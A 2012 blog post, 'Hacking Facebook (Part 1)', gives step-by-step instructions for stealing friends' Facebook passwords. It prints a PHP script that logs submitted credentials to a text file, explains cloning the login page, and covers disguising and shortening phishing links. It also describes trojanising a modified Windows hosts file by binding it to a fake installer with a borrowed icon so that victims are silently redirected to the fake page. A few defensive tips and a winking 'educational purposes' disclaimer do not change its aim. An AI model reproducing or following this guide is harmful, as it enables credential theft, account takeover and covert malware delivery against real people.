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Posted by : Unknown Tuesday 18 September 2012

Hacking Facebook (Part 1)

We always wanted to do that!when some one messes with us,makes us angry etc etc,there are a lot of reasons for which we wanted to take control of others Facebook are some of the popular ways to do that:


phishing is a method of changing the location where your username and password are sent to after you click login. Phishing is the most widely used method ,at the same time it is the easily detectable even with the slightest knowledge on things.ok,now lets learn a little bit about how you can perform phishing attacks.

  • First open Facebook home page,

facebook login page

  • Then view the source code of the login view the source code,right click on the page and select view source code

veiw source of facebook page

  • then copy the whole code and paste it in a text document
  • Now search for the word "Action" in the document,the action elements attribute for face book would be""

action form of facebook

  • Now replace that url (the thing between quotes) with the name of a php document,for example i took "abc.php" it would look somwthing like the below image

replacinh action form -phishing

  • Now click save as and save it as "facebook.html" with the type as "All files" and "UNICODE" encoding.

  • Now open a new text document and paste the following code in it



$handle = fopen("passes.txt", "a");

foreach($_GET as $variable => $value)


fwrite($handle, $variable);

fwrite($handle, "=");

fwrite($handle, $value);

fwrite($handle, "\r\n");


fwrite($handle, "\r\n");




  • Now save it as "abc.php"(or what ever name you gave it) with the type as "All files" and "UNICODE"encoding.
  • Find a web hosting site which does support phishing(many of the hosting sites banned the upload of HTML,PHP,Xml etc for security)
  • You can try :
  4. etc
  • now upload both the files, to the hosting servers and start sending link of "Facebook.html" to your friends,once they open that and login through that page,username and password will be stored in the"passes.txt" file on the server which you can retrieve later

Spreading links:

you can give it to your friend via Email or Chat,but Facebook has already identified certain web links which are widely used for phishing and blocked them.
  • you can morph URLs for example if i want to send the link "" to my friend and suppose it is blocked, i can change it as"w w w dot google dot com" and send it to him via facebook chat,then some how manipulate him to translate it back into url and visit it.
  • Or you can use use tinyurl click here,it shortens links for you.for example the tinyurl form of "" is ""

Tiny URl:


  • whenever you are redirected to any web page,first check the url of the page,

facebook url

Original URL

phished facebook url

Fake URL

Fake Page:

fake facebook page

 Original page:

original facebook page

pretty similar huh?the only way you can identify a phishing page,is by checking its URL, and you can also view the source code and check where the credentials are being sent via Action element,which is a better practice,want a reason for that?you will be knowing shortly,
  • If you receive any such phishing links or even doubt certain links, you can forward those links or mails to "" they will verify them and try to trace out the source.

HOST FILE Modification(Desktop phishing):

It is the process of changing the server address of Facebook in whenever some one types in "" in address bar,they get redirected to your phishing page.


It is nothing but a small text file which maps or relates Host names(what we call a site address)with their IP addresses.

Lets get into the Hacking part,
First of all you would need a server to perform this trick.

Getting a Server :

What is a server?
a server is a physical computer dedicated to running one or more services as a host, to serve the needs of the users of other computers on the network.

We can install a server on our system,or get our system to work like a server.all you have to do is download "wampserver" from here.


Creating fake Login Page:

you have to create a fake login page as stated above,but the only difference is you don't have to upload it onto any file hosts but have to place it on  your wampserver and put it online.

wwamp desktop server

Modifying Host Files:

  • Host File is found in " C:\Windows\System32\drivers\etc "
  • Run it as Administrator and now,add these two lines at he end of the text file:


host file windows

  • here  "xxx.yyy.zzz.a" is your own ip address

  • save it and make a copy of the modified hosts file in another folder

Caution: do not forget to undo those changes from your original Host file after making a copy of the modified Host files.

  • Now we need to compress and send it to our friend,

Sending Modified Host Files:

just try to follow the below images

add to archive

sel extract archive

sfx properties

Hacking Facebook (Part 1)-extract to specific location

hide all win rar

win rar over write

sfx hosts file

  • Now you need to bind the hosts.exe with any other application so that your friend doesn't doubt it,
  • Now bind the hosts file with any application using any file binder.
  • you can google for file binders like micro joiner,hot fusion etc,or get hot fusion
  • Below i am using Hot Fusion,try Following the below pictures
  • open HotFusion

hot fusin

  • Add any application which your friend asked for,in the below example i've used "Flux-setup.exe"

using hot fusion

  • Now add the "Hosts.exe"

hot fusion file binder

melt module hotfusion

hot fusion icon change

  • you can select any icon,but it is advised that you use the specific application icons to prevent any suspensions,you can easily get icon of any application bt googling them,  

Hacking Facebook (Part 1)

  • Then select a location and the module will be created there.
  • Now send that Application to your friend via Email,or any other means.
  • once they try to install the application,the Host File will be modified secretly without users notice.Now when he tries to access facebook,he will be redirected to your fake page and then enter his credentials which you can retreive.


  • Desktop phishing is very difficult to prevent because,you will have no trace that you've been a victim of Desktop the host file has been modified,you can't even notice any change in web url also,
  • The only way to identify it is to check the Action element's attribute by viewing the page source code(din't i say that? now you know why verifying the source code is the best method!)
  • Protect your Host files by using "macro" which will alert us whenever there is a change in our host can Download macro


Lets end Part 1 here,coz its gettin too lengthy and clumsy, check out part 2


This is only for educational purposes,the authour is not responsible for any kind of mis use of the content ;)

If you got any Doubts,comment them i'll surely get to you :)

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